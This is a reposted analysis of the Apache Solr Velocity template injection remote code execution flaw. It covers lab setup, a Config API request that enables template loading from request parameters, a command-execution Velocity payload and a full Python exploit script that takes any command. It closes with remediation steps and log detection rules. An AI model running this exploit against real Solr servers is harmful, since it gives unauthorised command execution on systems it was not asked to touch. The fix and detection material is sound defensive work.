
Example analysis of Apache Solr velocity template injection RCE vulnerability

WBOY (repost), 2023-05-19 10:37:13

0x01 Introduction

Solr is an enterprise-grade standalone search server that exposes its functionality through a web service API. Clients submit XML documents in a defined format to the server over HTTP to build indexes, and issue search requests with HTTP GET to receive results in XML.

0x02 Vulnerability Introduction

Solr ships with the VelocityResponseWriter component. An attacker can send a crafted request to the Config API that changes the writer's configuration so that it loads templates supplied in request parameters; an attacker-controlled Velocity template is then rendered on the server, which is a template injection leading to remote command execution. The attacker gains code execution as the user running the Solr process.

0x03 Scope of impact

Apache Solr 5.x through 8.2.0, i.e. every release that exposes the Config API

0x04 Environment Setup

Install a Java 8 environment, then download Solr 8.2.0:

https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip

After downloading, unzip the archive, enter the bin directory and start Solr:

unzip solr-8.2.0.zip

cd solr-8.2.0/bin

./solr start


Some warnings about ulimit values appear during startup. They can be silenced by setting SOLR_ULIMIT_CHECKS=false in bin/solr.in.sh:

vim solr.in.sh


Then start again with ./solr start. Solr refuses to start as root by default; if you are running as root, append -force to the command.

Open http://ip:8983 in a browser. If the Solr admin UI appears, the installation succeeded.

Creating a core from the admin UI fails at this point, because the core's directory and configuration do not exist yet.

Prepare the core by hand first: create a new_core folder under server/solr/, copy the conf directory from server/solr/configsets/_default/ into new_core/, then click Add Core in the admin UI with the name new_core.

0x05 Vulnerability Reproduction

After creating the core, check whether its Config API endpoint is reachable without authentication:

http://ip:8983/solr/new_core/config

Solr 8.2.0 integrates the VelocityResponseWriter by default. Among the writer's initialization parameters, params.resource.loader.enabled defaults to false, which prevents templates from being supplied in request parameters. However, the same Config API that served the page above accepts unauthenticated POST requests that rewrite the writer's settings. Once params.resource.loader.enabled is set to true, a crafted GET request to the core's /select handler with wt=velocity and a template in v.template.custom is rendered server-side, giving remote code execution.

Capture the request for this page in Burp, change it to a POST to /solr/new_core/config with the header Content-Type: application/json, and send the following body:

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

A response with "status":0 in the responseHeader means the overlay was accepted; a GET to the same /config URL afterwards shows the velocity writer with both loader flags set to true.


Next, construct the payload that performs the RCE. The Velocity template obtains java.lang.Runtime through reflection on the Class object of an empty string, runs the command, waits for it to finish, and copies the process's stdout byte by byte into the response. The core name in the URL must match the core created above (new_core here):

payload:

http://ip:8983/solr/new_core/select?q=1&wt=velocity&v.template=custom&v.template.custom=#set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('id')) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

The template is shown unencoded for readability. When sending it from a browser or curl, URL-encode it (at least # as %23 and spaces as %20); otherwise everything from the first # onwards is treated as a URL fragment and never reaches Solr. The response body then contains the output of id, run as the user that owns the Solr process.
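The two requests above, assembled in Python as an added example; this is not the article's code and not the linked PoC. It assumes the host ip:8983 and the core new_core from the article and no authentication in front of Solr. The velocity_template function generalises the page's payload to any whitespace-separated command, because java.lang.Runtime.exec(String) tokenises on whitespace and does not understand shell quoting, and select_url shows the percent-encoding the page's payload needs before it can be sent.

```python
import json
import urllib.request
from urllib.parse import quote, urlencode

# Placeholder host and core name taken from the article; change for your lab.
SOLR_BASE = "http://ip:8983/solr"
CORE = "new_core"


def config_api_body():
    """JSON body for POST /solr/<core>/config.

    Re-registers the velocity writer with params.resource.loader.enabled
    set to true, the weak setting that lets a template arrive in request
    parameters.
    """
    body = {
        "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true",
        }
    }
    return json.dumps(body)


def velocity_template(cmd):
    """Velocity template equivalent to the article's payload, with the
    command parameterised.  Runtime.exec(String) splits cmd on whitespace,
    so 'cat /etc/passwd' works but pipes, redirects and quotes do not;
    cmd must also not contain a single quote, which would end the literal.
    """
    return (
        "#set($x='')"
        "#set($rt=$x.class.forName('java.lang.Runtime'))"
        "#set($chr=$x.class.forName('java.lang.Character'))"
        "#set($str=$x.class.forName('java.lang.String'))"
        "#set($ex=$rt.getRuntime().exec('" + cmd + "'))"
        "$ex.waitFor()"
        "#set($out=$ex.getInputStream())"
        "#foreach($i in [1..$out.available()])"
        "$str.valueOf($chr.toChars($out.read()))"
        "#end"
    )


def select_url(cmd):
    """GET URL for /select with the template percent-encoded.

    quote_via=quote encodes '#' as %23 and spaces as %20; without that a
    browser or curl drops everything from the first '#' as a URL fragment.
    """
    params = {
        "q": "1",
        "wt": "velocity",
        "v.template": "custom",
        "v.template.custom": velocity_template(cmd),
    }
    return SOLR_BASE + "/" + CORE + "/select?" + urlencode(params, quote_via=quote)


def run(cmd):
    """Send both requests and return the command output from the response.
    This makes network calls; use it only against a lab instance you own."""
    req = urllib.request.Request(
        SOLR_BASE + "/" + CORE + "/config",
        data=config_api_body().encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        resp.read()
    with urllib.request.urlopen(select_url(cmd)) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    print(config_api_body())
    print(select_url("id"))
```

The Config API POST is idempotent, so resending it while debugging the GET is harmless; what matters is that the GET reaches Solr with v.template.custom intact, which is why the encoded form is printed rather than the readable one.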


POC address: https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template

0x06 Fix

Upgrade to a Solr release in which params.resource.loader.enabled can no longer be turned on for the Velocity writer through the Config API.

Where an upgrade cannot happen immediately, reduce exposure: remove the VelocityResponseWriter entry from solrconfig.xml if the /browse UI is not used, start Solr with -Ddisable.configEdit=true so the Config API becomes read-only, and keep port 8983 off untrusted networks with authentication in front of it. After the change, fetch /solr/<core>/config again and confirm that no Velocity writer reports params.resource.loader.enabled as true.
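Two checks a defender would want after applying the fix, as an added example that is not part of the original article: one inspects the Config API output for a Velocity writer that still allows templates in request parameters, the other scans request logs for exploitation attempts. The shape of the config response (a top-level "config" object holding a "queryResponseWriter" map) and the sample log lines are assumptions constructed here, modelled on Solr's own request log and the Jetty access log; adjust the patterns to the log format actually in use.

```python
import json
import re

# Constructed sample of a GET /solr/<core>/config response (shape assumed;
# compare with what your Solr version actually returns).
CONFIG_WEAK = json.dumps({
    "responseHeader": {"status": 0},
    "config": {
        "queryResponseWriter": {
            "json": {"name": "json", "class": "solr.JSONResponseWriter"},
            "velocity": {
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "startup": "lazy",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true",
            },
        }
    },
})
# Same response after the loader flag has been turned off.
CONFIG_SAFE = CONFIG_WEAK.replace('"params.resource.loader.enabled": "true"',
                                  '"params.resource.loader.enabled": "false"')


def velocity_writer_exposed(config_json):
    """True if any registered VelocityResponseWriter allows templates to be
    supplied in request parameters (params.resource.loader.enabled == true)."""
    writers = json.loads(config_json).get("config", {}).get("queryResponseWriter", {})
    for spec in writers.values():
        if spec.get("class") != "solr.VelocityResponseWriter":
            continue
        if str(spec.get("params.resource.loader.enabled", "false")).lower() == "true":
            return True
    return False


# Detection rules over request logs.  solr.log records the decoded query
# parameters of each request; the Jetty access log records method and path,
# which is where a Config API write (POST .../config) becomes visible.
RULES = [
    ("velocity-template-in-params",
     re.compile(r"wt=velocity.*v\.template\.custom=")),
    ("velocity-java-reflection",
     re.compile(r"v\.template\.custom=.*?(class\.forName|getRuntime|ProcessBuilder)")),
    ("config-api-write",
     re.compile(r'"POST /solr/[^/]+/config[ ?"]')),
]

# Constructed sample lines.  Lines 1 and 3 are benign: the stock /browse UI
# also uses wt=velocity, but with templates read from conf/, not from the
# request.  Line 2 is the Config API write, line 4 the template injection.
SAMPLE_LOG = """\
2019-10-31 12:00:01.101 INFO  (qtp1-17) [   x:new_core] o.a.s.c.S.Request [new_core]  webapp=/solr path=/select params={q=*:*&wt=json} hits=0 status=0 QTime=1
10.0.0.5 - - [31/Oct/2019:12:00:02 +0000] "POST /solr/new_core/config HTTP/1.1" 200 75
2019-10-31 12:00:02.500 INFO  (qtp1-18) [   x:new_core] o.a.s.c.S.Request [new_core]  webapp=/solr path=/browse params={q=*:*&wt=velocity&v.template=browse&v.layout=layout} hits=0 status=0 QTime=4
2019-10-31 12:00:03.307 INFO  (qtp1-19) [   x:new_core] o.a.s.c.S.Request [new_core]  webapp=/solr path=/select params={q=1&wt=velocity&v.template=custom&v.template.custom=#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($ex=$rt.getRuntime().exec('id'))$ex.waitFor()} hits=0 status=0 QTime=12
"""


def scan_log(text):
    """Return (line number, rule name) for every rule that fires on a line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((lineno, name))
    return hits


if __name__ == "__main__":
    print("velocity writer exposed:", velocity_writer_exposed(CONFIG_WEAK))
    for lineno, name in scan_log(SAMPLE_LOG):
        print(lineno, name)
```

The config-api-write rule fires on every Config API write, not only on velocity changes, because the request body is not in the access log; on a host where clients never edit configuration at runtime that is the right level of suspicion, and on one where they do the rule should be narrowed to the affected cores.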


Statement:
This article is reproduced from yisu.com. In case of infringement, contact admin@php.cn for removal.